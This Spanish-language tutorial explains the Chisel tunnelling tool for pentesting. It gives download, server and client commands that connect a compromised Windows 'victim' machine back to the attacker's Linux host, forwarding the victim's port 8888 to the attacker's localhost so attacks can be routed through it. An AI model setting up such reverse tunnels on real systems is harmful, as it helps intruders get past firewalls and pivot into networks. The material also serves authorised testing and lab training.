Índice

¿Qué es Chisel?

Chisel es una herramienta que se utiliza para crear un túnel TCP/UDP rápido, transportado a través del servicio HTTP y protegido a través de SSH. Está escrito en Go y usa el protocolo de cliente a servidor. Chisel es principalmente útil para pasar a través de firewalls, aunque también se puede emplear para proporcionar un punto final seguro en su red.

Como instalar Chisel

La herramienta la podéis descargar desde el siguiente repositorio de Github, en el podréis encontrar tanto la versión para Linux, como las versiones de 32 y 64 bits para Windows:

https://github.com/jpillora/chisel/releases/tag/v1.7.7

Es importante tener claro de que en caso de querer establecer una conexión entre un sistema Linux y un Windows, tendremos que descargarnos las dos versiones correspondientes para cada sistema.

Redireccionar puertos con Chisel a nuestra localhost:

Una vez hemos ganado acceso o tenemos la posibilidad de subir archivos y ejecutar comandos en el dispositivo víctima, podemos crear un túnel con Chisel. Mediante esta herramienta podremos establecer una conexión de cliente a servidor y conectar dos puertos entre sí. Básicamente, conectamos un puerto de la máquina víctima con uno de nuestro equipo, de tal forma, que podemos ejecutar cualquier herramienta en local usando ese puerto, y automáticamente se redireccionara el ataque a la máquina víctima.

Establecer conexión por parte del Servidor (Linux):

En primer lugar, debemos de establecer Chisel en modo Servidor en nuestro sistema Linux, para ello debemos de asegurarnos que la versión de Chisel instalada es la adecuada para nuestra distribución. Para establecer nuestro sistema como servidor simplemente ejecutamos el siguiente comando especificando el puerto que por el que vamos a establecer la conexión. Es importante que este puerto no se encuentre en uso.
				
					chisel server --reverse --port [Puerto Local Conexión] 
				
			
				
					./chisel server --reverse -p [Puerto Local Conexión] 
				
			

Ejemplo:

				
					chisel server --reverse -p 8081
				
			

Aquí podemos ver como en el ejemplo hemos establecido un servicio de servidor con Chisel por el puerto 8081, este puerto es el que posteriormente tendremos que especificar en el servicio por parte del Cliente para realizar la conexión.

Establecer conexión por parte del Cliente (Windows):

Para establecer Chisel en un sistema Windows como Cliente, nos descargamos la versión específica para Windows (debemos de comprobar si el sistema es de 32 o 64 bits) y ejecutamos el siguiente comando. En él debemos especificar el puerto por el que vamos a comunicarnos con nuestro servicio Servidor y los puestos que vamos a comunicar entre sí:

				
					.\chisel.exe client [Ip Local]:[Puerto de Conexión] R:[Puerto Víctima]:127.0.0.1:[Puerto Local]
				
			
  • [Ip Local]: Es la Ip de nuestro sistema Servidor. O en caso de estar conectados por VPN su Ip pública.
  • [Puerto de Conexión]: Es el puerto establecido en la conexión con el Servidor. Debe ser el mismo puerto que especificado en el sistema Linux.
  • [Puerto Víctima] y [Puerto Local]: El puerto Víctima pasará a ser el puerto local de nuestro local host 127.0.0.1.

Ejemplo:

				
					.\chisel.exe client 10.10.14.25:8081 R:8888:127.0.0.1:8888
				
			

Como podéis comprobar, la conexión se realiza a través del puerto 8081, conectando de forma local nuestro puerto 8888 con el suyo.